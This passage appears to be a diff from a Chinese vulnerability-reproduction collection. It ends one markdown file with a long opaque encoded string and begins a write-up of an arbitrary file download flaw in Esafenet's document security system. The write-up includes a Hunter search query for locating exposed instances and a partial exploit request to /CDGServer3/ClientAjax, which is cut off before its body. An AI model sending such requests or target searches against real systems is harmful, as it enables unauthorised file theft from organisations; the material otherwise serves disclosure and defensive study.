+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706604760110-7ce8a195-a50b-4f62-b39d-911451a3a9a7.png](./img/af7dsU7CiKjv9PIM/1706604760110-7ce8a195-a50b-4f62-b39d-911451a3a9a7-211727.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hwfcqb1i5g4tcpfi>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md b/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md
new file mode 100644
index 0000000..a49d0db
--- /dev/null
+++ b/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md
@@ -0,0 +1,33 @@
+# 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/mbkO_M4VWp-8yvxF/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-404683.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/ClientAjax HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
